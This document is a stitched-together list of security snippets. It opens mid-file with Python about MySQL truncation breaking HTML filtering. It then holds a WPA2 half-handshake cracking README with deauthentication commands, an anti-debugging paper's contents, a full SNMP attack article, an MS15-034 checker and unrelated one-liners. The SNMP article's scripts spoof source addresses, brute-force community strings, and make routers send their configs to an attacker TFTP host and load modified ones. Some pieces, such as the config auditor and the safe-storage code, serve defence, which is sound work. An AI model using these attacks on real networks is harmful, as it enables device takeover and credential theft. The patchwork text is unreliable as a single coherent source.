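MYSQL_TEXT_MAX = 65535  # bytes; a MySQL TEXT column silently cuts at this size


def truncate_to_bytes(s: str, limit: int = MYSQL_TEXT_MAX) -> str:
    """Cut at a byte limit without splitting a multibyte UTF-8 character,
    which is the effect an INSERT into a TEXT column has on long input."""
    return s.encode("utf-8")[:limit].decode("utf-8", errors="ignore")


def ends_inside_tag(html: str) -> bool:
    """True when the last '<' has no later '>', i.e. the text was cut in the
    middle of a tag or attribute, which is what lets a stray attribute like
    onmouseover= in the advisory's PoC become live markup."""
    return html.rfind("<") > html.rfind(">")


def store_comment_unsafe(filtered_html: str) -> str:
    """Mirror the bug: filter first, then let the column size decide."""
    return truncate_to_bytes(filtered_html)


def store_comment_safe(filtered_html: str) -> str:
    """Refuse anything the column would alter, so filtered == stored == rendered."""
    if len(filtered_html.encode("utf-8")) > MYSQL_TEXT_MAX:
        raise ValueError("comment too long")
    if ends_inside_tag(filtered_html):
        raise ValueError("comment contains an unterminated tag")
    return filtered_html


def safe_rejects(filtered_html: str) -> bool:
    """True when store_comment_safe refuses the comment."""
    try:
        store_comment_safe(filtered_html)
    except ValueError:
        return False if False else True
    return False


# Constructed comments: the long one has the shape of the advisory's PoC
# (an <a> with an oversized title attribute) but carries no script.
LONG_COMMENT = "<a title='" + "A" * 70000 + "'>link</a>"
SHORT_COMMENT = "<a title='hello'>link</a>"

if __name__ == "__main__":
    stored = store_comment_unsafe(LONG_COMMENT)
    print("unsafe path stored bytes:", len(stored.encode()),
          "cut inside a tag:", ends_inside_tag(stored))
    print("safe path rejects long comment:", safe_rejects(LONG_COMMENT))
    print("safe path keeps short comment:", store_comment_safe(SHORT_COMMENT) == SHORT_COMMENT)
```

On the unsafe path the long comment is stored as 65535 bytes ending somewhere inside the title attribute, so the closing quote, `>` and `</a>` that the filter saw are gone from what the page renders. The safe path rejects the same comment before it reaches the database and passes the short one through unchanged.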
  17. Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full four-way handshake is then used in a dictionary attack. This tool is a Proof of Concept to show it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client within range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against the failed handshake.

Install

$ sudo python setup.py install

Sample use

$ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1"

-r Where to read input pcap file with half handshake (works with full handshakes too)
-m AP mac address (From the 'fake' access point that was used during the capture)
-s AP SSID
-d (optional) Where to read dictionary from

Capturing half handshakes

To listen for device probes the aircrack suite can be used as follows

sudo airmon-ng start wlan0
sudo airodump-ng mon0

You should begin to see device probes with BSSID set as (not associated) appearing at the bottom. If WPA2 SSIDs pop up for these probes, these devices can be targeted.

Set up a WPA2 wifi network with an SSID the same as the desired device probe. The passphrase can be anything. In Ubuntu this can be done here: 3 Ways to Create Wifi Hotspot in Ubuntu 14.04 (Android Support) | UbuntuHandbook

Capture traffic on this interface. In Linux this can be achieved with TCPdump

sudo tcpdump -i wlan0 -s 65535 -w file.cap

(optional) Deauthenticate clients from nearby WiFi networks to increase probes

If there are not enough unassociated clients, the aircrack suite can be used to deauthenticate clients off nearby networks: deauthentication [Aircrack-ng]

Source: https://github.com/dxa4481/WPA2-HalfHandshake-Crack
  18. Contents

1. NtGlobalFlag
2. Heap flags
3. The Heap
4. Thread Local Storage
5. Anti-Step-Over
6. Hardware
   A. Hardware breakpoints
   B. Instruction Counting
   C. Interrupt 3
   D. Interrupt 0x2d
   E. Interrupt 0x41
   F. MOV SS
7. APIs
   A. Heap functions
   B. Handles
      i. OpenProcess
      ii. CloseHandle
      iii. CreateFile
      iv. LoadLibrary
      v. ReadFile
   C. Execution Timing
   D. Process-level
      i. CheckRemoteDebuggerPresent
      ii. Parent Process
      iii. CreateToolhelp32Snapshot
      iv. DbgBreakPoint
      v. DbgPrint
      vi. DbgSetDebugFilterState
      vii. IsDebuggerPresent
      viii. NtQueryInformationProcess
      ix. OutputDebugString
      x. RtlQueryProcessHeapInformation
      xi. NtQueryVirtualMemory
      xii. RtlQueryProcessDebugInformation
      xiii. SwitchToThread
      xiv. Toolhelp32ReadProcessMemory
      xv. UnhandledExceptionFilter
      xvi. VirtualProtect
   E. System-level
      i. FindWindow
      ii. NtQueryObject
      iii. NtQuerySystemInformation
      iv. Selectors
   F. User-interface
      i. BlockInput
      ii. FLD
      iii. NtSetInformationThread
      iv. SuspendThread
      v. SwitchDesktop
   G. Uncontrolled execution
      i. CreateProcess
      ii. CreateThread
      iii. DebugActiveProcess
      iv. Enum...
      v. GenerateConsoleCtrlEvent
      vi. NtSetInformationProcess
      vii. NtSetLdtEntries
      viii. QueueUserAPC
      ix. RaiseException
      x. RtlProcessFlsData
      xi. WriteProcessMemory
      xii. Intentional exceptions
   H. Conclusion

Download: http://pferrie.host22.com/papers/antidebug.pdf
  19. Hacking networks with SNMP

Posted on April 21, 2015 by Torstein

Summary

Exploiting common misconfigurations in network systems allows an attacker to gather and use information to take over and control network devices. This can be done just as easily to core equipment as to Customer-Premises Equipment (CPE). A large scale attack will make it possible to hijack an entire Internet Service Provider (ISP) within a very short time. This demonstration will be done against a virtualized Cisco network, but the same techniques apply to other vendors like Juniper, HP, Linux and others.

Virtualization

To prevent doing any damage to real networks, I will use GNS3 with Cisco to emulate a basic WAN. As for the attacking computer, a virtual Kali Linux will be attached to the network.

Attacker IP: 80.200.43.20

Cisco configuration example for SNMP and NTP:

interface GigabitEthernet0/0
 ip address 88.0.3.10 255.255.255.0
!
ip access-list standard management
 remark ### NTP ###
 permit 80.2.0.64
 remark ### SNMP ###
 permit 80.2.0.33
!
snmp-server community _________ RW management
!
line vty 0 4
 access-class management in
!
ntp server 80.2.0.64

Discovering devices

The initial scan plays an important role in discovering remote vulnerable devices. SNMP configured with an access-list will still indicate an open port when you connect to it. The access-list will of course deny any type of request you make to the device unless the packet comes from an allowed IP.

One of the easiest ways to discover what type of network device you are up against is by running an NTP query. By configuring "ntp server x.x.x.x", we are not only synchronizing the device to that time-server, but it also turns the device into an NTP server itself.
This allows us to find some unwanted information like equipment type and Refid, which is equal to the NTP server's server, along with a possible target for NTP reflection attacks. Apply some common sense, whois lookups and brute DNS tools – it won't take long before you know where the management server pool is. Cisco devices vulnerable to CVE-2014-3309 also seem to be open for NTP queries like this.

ntp server 80.2.0.64
ntp access-group peer management

This can be avoided by configuring an access-list associated with the NTP configuration, firewalling the device or Control Plane Policing.

Hacking SNMP Blindfolded

Spoofing the UDP packets' source address will bypass the SNMP access-list "management", and by blasting away thousands of passwords/sec we may find the SNMP community string. The question is, how do we know when we found the correct community string? By sending IP spoofed Object Identifiers (OIDs) to the SNMP Management Information Base (MIB), we are able to tell the router to execute a command IF our community string is accepted. I decided to do some performance testing on live equipment, and a Cisco 881-k9 was only able to handle 40000 attacks/min due to poor CPU performance. Split a dictionary between 100 CPEs like the 881-k9 and you will be able to test ~4mill passwords/min.

So, how is this really done?

Spoof source IP: 80.2.0.64, Destination mr router: 88.0.3.10

Hello mr router. The secret is "public", please ping 80.200.43.20
- wrong secret, request dropped -

Hello mr router. The secret is "private", please ping 80.200.43.20
- correct secret, request accepted -
- sending ICMP packet to 80.200.43.20 as you asked for -

Network sniffer detecting a ICMP packet from mr router(88.0.3.10)
Correct secret was found for mr router between line(RTT+0.1sec) and line(current time)

We got the community – so how to get access? More spoofing! Send another batch of spoofed OIDs to the router; we are now able to tell the router to upload its configuration to a TFTP server. (I had some issues with TFTP in Kali, so I booted a Ubuntu machine running xinetd with the IP 80.200.43.21.) After analyzing the router configuration, we can make a few modifications like adding a new user and removing the management access-lists for VTY. Now we can upload the new configuration back to the router with similar OIDs asking the router to download a file from the TFTP server and import it to the running-config.

How to protect your equipment

1. BCP 38/RFC 2827
Source-address filter your network; a router will stop any packets not matching the reverse route for the sender's source address. BCP38 should be enabled at the edge of your network facing both customers and other Internet Service Providers. This does not only protect you and others against this type of attack, but also against UDP reflection DDoS attacks.
Warning: A network with asymmetrical routing may experience issues with BCP38.

2. SNMPv3
SNMP version 3 offers both username and password support. Spoofing SNMPv3 is way more difficult than SNMPv1-2c due to password and packet encryption, discovery handshake and message integrity checks.

3. Filtering
Deny NTP and SNMP with Access Control Lists (ACL), Control Plane Policing (CoPP) or firewalls.

4. Testing
Do a network scan on equipment before you deploy a new model to check for unwanted services and ports.

Edit: after speaking with Cisco PSIRT, I was recommended the following materials to fortify and protect network devices.
There won't be any security advisory/CVE since the UDP spoofing attack is a known issue – even considering it's a new attack vector.

Cisco Guide to Harden Cisco IOS Device
Team CYMRU – Secure IOS template

Concept code

Download config

#!/bin/bash
STRING=private
IP=88.0.3.10
SOURCEIP=80.2.0.64
TFTP=80.200.43.21
FILENAME=running-config

iptables -t nat -A POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 4
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 1
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a $TFTP
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s $FILENAME
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1
iptables -t nat -D POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP

Upload config

#!/bin/bash
STRING=private
IP=88.0.3.10
SOURCEIP=80.2.0.64
TFTP=80.200.43.21
FILENAME=change-config

iptables -t nat -A POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 6
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.2.111 i 1
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.3.111 i 1
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.4.111 i 4
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.111 a $TFTP
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.6.111 s $FILENAME
snmpset -c $STRING -v 1 $IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.111 i 1
iptables -t nat -D POSTROUTING -p udp --dport 161 -j SNAT --to-source $SOURCEIP

Blind Password cracking – POC

#!/usr/bin/python
import socket, sys, time
from scapy.all import *
from multiprocessing import Process, Array

iptoping = '\x50\xc8\x2b\x14' # 80.200.43.20 in hex
ipaddr = ['88.0.3.14','88.0.3.6','88.0.3.10'] # target routers
spoofedserver = '80.2.0.64' # ntpq -c rv TARGET_CPE | grep refid # Need to be permitted by router's snmp ACL
snmpfile = 'best-snmppasswords.txt'
defaultdelay = 0.0011
rtt = 1 #ms delay to targets

# check if loopback-interface with spoofed IP is up and running
stest = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
    stest.bind((spoofedserver, 0))
except:
    print "ifconfig lo:0 " + spoofedserver + " netmask 255.255.255.255 up"
    sys.exit()

rtt = rtt/1000
defaultdelay = int(defaultdelay*1000000)

def snmpscan(ip, delayhigh, stop, dictline, c, minline, maxline): # add delays and such
    f = open(snmpfile, 'r')
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    delay = delayhigh[c]/1000000.0
    s.bind((spoofedserver, 500+c))
    counter = 1
    for community in f:
        if stop[c] == True:
            return
        if (minline[c] <= counter and maxline[c] >= counter) or maxline[c] == 0:
            community = community.rstrip()
            snmp = []
            # packet length need to be included in SNMP.
            length = str("%0.2x" % (len(community))).decode('hex')
            splen = str("%0.2x" % (len(community)+42)).decode('hex')
            xplen = str("%0.2x" % (len(community)+49)).decode('hex')
            yplen = str("%0.2x" % (len(community)+45)).decode('hex')
            snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community +
                        '\xa3\x23\x02\x04\x1e\x4d\xa9\x90\x02\x01\x00\x02\x01\x00\x30'
                        '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                        '\x01\x10\x82\x4d\x02\x01\x06')
            snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community +
                        '\xa3\x23\x02\x04\x1a\x91\xe1\x36\x02\x01\x00\x02\x01\x00\x30'
                        '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                        '\x01\x10\x82\x4d\x02\x01\x05')
            snmp.append('\x30' + xplen + '\x02\x01\x00\x04' + length + community +
                        '\xa3\x2a\x02\x04\x6e\xaf\x5b\x8c\x02\x01\x00\x02\x01\x00\x30'
                        '\x1c\x30\x1a\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                        '\x01\x0f\x82\x4d\x04\x08\x61\x6e\x79\x5f\x6e\x61\x6d\x65')
            snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community +
                        '\xa3\x23\x02\x04\x66\x9c\x88\x99\x02\x01\x00\x02\x01\x00\x30'
                        '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                        '\x01\x02\x82\x4d\x02\x01\x01')
            snmp.append('\x30' + yplen + '\x02\x01\x00\x04' + length + community +
                        '\xa3\x26\x02\x04\x13\x3a\x66\x29\x02\x01\x00\x02\x01\x00\x30'
                        '\x18\x30\x16\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                        '\x01\x03\x82\x4d\x04\x04' + iptoping)
            snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community +
                        '\xa3\x23\x02\x04\x21\x98\x9b\xcd\x02\x01\x00\x02\x01\x00\x30'
                        '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                        '\x01\x04\x82\x4d\x02\x01\x01') # last hex = number of icmp packets
            snmp.append('\x30' + splen + '\x02\x01\x00\x04' + length + community +
                        '\xa3\x23\x02\x04\x7c\xe9\x79\x42\x02\x01\x00\x02\x01\x00\x30'
                        '\x15\x30\x13\x06\x0e\x2b\x06\x01\x04\x01\x09\x09\x10\x01\x01'
                        '\x01\x10\x82\x4d\x02\x01\x01')
            for payload in snmp:
                s.sendto(payload, (ip, 161))
            dictline[c] = counter
            time.sleep(delay)
            if stop[c] == True:
                return
        counter += 1
    f.close()
    stop[c] = True

def reply(packet):
    try:
        if packet[ICMP]:
            pos = ipaddr.index(packet[IP].src)
    except:
        return
    for x in processes:
        if x.name == ipaddr[pos]:
            minline[pos] = int((dictline[pos]-(0.05+rtt)/(delay[pos]/1000000.0))+1) if 0 < (0.05+rtt)/(delay[pos]/1000000.0) else 1
            maxline[pos] = dictline[pos]
            if minline[pos] == maxline[pos]:
                f = open(snmpfile, 'r')
                g = 1
                for lines in f:
                    if g == maxline[pos]:
                        print 'SNMP Community for', ipaddr[pos], 'is:', lines.rstrip()
                    g += 1
            else:
                print '%s snmp community found between line %d and %d in %s. Please wait while narrowing it down.'%(ipaddr[pos], int((dictline[pos]-(0.05+rtt)/(delay[pos]/1000000.0))+1) if 0 < (0.05+rtt)/(delay[pos]/1000000.0) else 1, dictline[pos], snmpfile)
                stop[pos] = True # original had '==' (a comparison, not an assignment)
                x.terminate()
                time.sleep(1) # wait for existing thread to stop
                dictline[pos] = 1
                stop[pos] = False
                delay[pos] = delay[pos]*5
                p = Process(target=snmpscan, name=ipaddr[pos], args=(ipaddr[pos], delay, stop, dictline, pos, minline, maxline))
                processes[pos] = p
                p.start()

if __name__ == "__main__":
    global processes
    processes = []
    dictline = Array('i', [1]*len(ipaddr))
    stop = Array('i', [False]*len(ipaddr))
    minline = Array('i', [0]*len(ipaddr))
    maxline = Array('i', [0]*len(ipaddr))
    delay = Array('i', [defaultdelay]*len(ipaddr))
    c = 0
    for a in ipaddr:
        p = Process(target=snmpscan, name=a, args=(a, delay, stop, dictline, c, minline, maxline))
        processes.append(p)
        p.start()
        c += 1
    sniff(prn=reply, filter="icmp", store=0)

Source: https://0x41.no/hacking-networks-with-snmp/
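A defender's counterpart to the post above, added here as an example and not the article's code: a small audit of an IOS config text for the weaknesses the post exploits (community-based SNMP behind a source-address ACL, NTP without an access-group, vty lines without an access-class, interfaces without uRPF) against the fixes it lists. The two sample configs are constructed; COMMUNITY_PLACEHOLDER, AUTH_PLACEHOLDER and PRIV_PLACEHOLDER are placeholders, and the SNMPv3 group/user and uRPF lines in the hardened variant are my assumptions, not from the article.

```python
import re

# Constructed sample: the article's example config; the community string is a
# labelled placeholder, as in the original post.
WEAK_CONFIG = """\
interface GigabitEthernet0/0
 ip address 88.0.3.10 255.255.255.0
!
ip access-list standard management
 remark ### NTP ###
 permit 80.2.0.64
 remark ### SNMP ###
 permit 80.2.0.33
!
snmp-server community COMMUNITY_PLACEHOLDER RW management
!
line vty 0 4
 access-class management in
!
ntp server 80.2.0.64
"""

# Constructed hardened variant (assumed, not from the article): SNMPv3 authPriv
# instead of a community, the recommended NTP access-group, and uRPF (BCP38).
HARDENED_CONFIG = """\
interface GigabitEthernet0/0
 ip address 88.0.3.10 255.255.255.0
 ip verify unicast source reachable-via rx
!
snmp-server group netops v3 priv access management
snmp-server user monitor netops v3 auth sha AUTH_PLACEHOLDER priv aes 128 PRIV_PLACEHOLDER
!
line vty 0 4
 access-class management in
!
ntp server 80.2.0.64
ntp access-group peer management
"""

def audit_ios_config(text):
    """Return (severity, message) findings for the weaknesses the article exploits."""
    lines = [l.rstrip() for l in text.splitlines()]
    findings = []
    # Community-based SNMP (v1/v2c) is guarded only by a source-address ACL,
    # which a spoofed UDP source satisfies; RW additionally allows config writes.
    for l in lines:
        m = re.match(r"snmp-server community \S+(?: (RO|RW))?(?: (\S+))?$", l)
        if m:
            mode, acl = m.groups()
            findings.append(("high" if mode == "RW" else "medium",
                             "SNMPv1/v2c community (%s, ACL %s) is spoofable; use SNMPv3 authPriv"
                             % (mode or "RO", acl or "none")))
    # 'ntp server' also makes the device an NTP server; without an access-group
    # it answers queries (refid, vendor) from any source.
    if any(l.startswith("ntp server ") for l in lines) and \
       not any(l.startswith("ntp access-group ") for l in lines):
        findings.append(("medium", "NTP enabled without 'ntp access-group peer <acl>'"))
    # Per-block checks: vty lines need an access-class; interfaces need uRPF
    # (ip verify unicast source reachable-via) so spoofed sources are dropped.
    block, vty_ok, urpf = None, {}, {}
    for l in lines:
        if l.startswith("line vty"):
            block, vty_ok[l] = ("vty", l), False
        elif l.startswith("interface "):
            block, urpf[l[10:]] = ("if", l[10:]), False
        elif l == "!":
            block = None
        elif block and block[0] == "vty" and l.lstrip().startswith("access-class "):
            vty_ok[block[1]] = True
        elif block and block[0] == "if" and "ip verify unicast source reachable-via" in l:
            urpf[block[1]] = True
    findings += [("high", "%s has no access-class" % v) for v, ok in vty_ok.items() if not ok]
    findings += [("low", "%s lacks uRPF (BCP38)" % i) for i, ok in urpf.items() if not ok]
    return findings
```

Running `audit_ios_config(WEAK_CONFIG)` yields one high (RW community), one medium (open NTP) and one low (no uRPF) finding; the hardened variant yields none.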
  20. Microsoft expands its bug bounty programs to include Azure, Sway, and Project Spartan | VentureBeat | Security | by Emil Protalinski
  21. The Dislike button can be removed from the AdminCP, quickly.
  22. '''
MS15-034 Checker

Danger! This script has not been properly qa'd and will probably fail in terrible ways.
It is based off a change in HTTP!UlpParseRange in which an error code is returned as a
result of a call to HTTP!RtlULongLongAdd when evaluating the upper and lower range of an
HTTP range request.

-BF

8a8b2112 56          push esi
8a8b2113 6a00        push 0
8a8b2115 2bc7        sub  eax,edi
8a8b2117 6a01        push 1
8a8b2119 1bca        sbb  ecx,edx
8a8b211b 51          push ecx
8a8b211c 50          push eax
8a8b211d e8bf69fbff  call HTTP!RtlULongLongAdd (8a868ae1) ; here
'''
import socket
import random

ipAddr = "" # host to check; fill in before running
hexAllFfff = "18446744073709551615"

req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"

print " [*] Audit Started"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req1)
boringResp = client_socket.recv(1024)
if "Microsoft" not in boringResp:
    print " [*] Not IIS"
    exit(0)
client_socket.close()

client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested Range Not Satisfiable" in goodResp:
    print "[!!] Looks VULN"
elif " The request has an invalid header name" in goodResp:
    print " [*] Looks Patched"
else:
    print " [*] Unexpected response, cannot discern patch status"

Source: http://pastebin.com/raw.php?i=ypURDPc4
  23. The fuzzing module is cool. It doesn't do much, but if you go through the responses by hand it can be very useful.
  24. Changes: A new attack mode has been added. A completely new fuzzing dialog has been introduced that allows multiple injection points to be attacked at the same time. Various other updates and additions.
  25. When I took it, and probably still now: pen and paper. And there are two parts: Computer Science and Math.